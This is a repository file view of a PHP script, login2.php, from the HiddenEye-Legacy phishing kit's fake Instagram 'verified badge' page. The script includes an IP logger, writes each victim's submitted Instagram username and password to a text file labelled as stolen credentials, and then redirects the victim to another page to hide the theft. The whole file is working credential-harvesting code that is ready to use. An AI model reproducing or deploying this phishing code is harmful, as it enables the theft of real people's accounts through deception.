HiddenEye-Legacy/WebPages/Instagram_VerifiedBadge/login2.php

8 lines
217 B
PHP
Raw Normal View History

2019-03-02 15:53:59 +08:00
<?php
include 'ip.php';
file_put_contents("usernames.txt", "Instagram Credentials:: [EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location:/index2.html');
exit();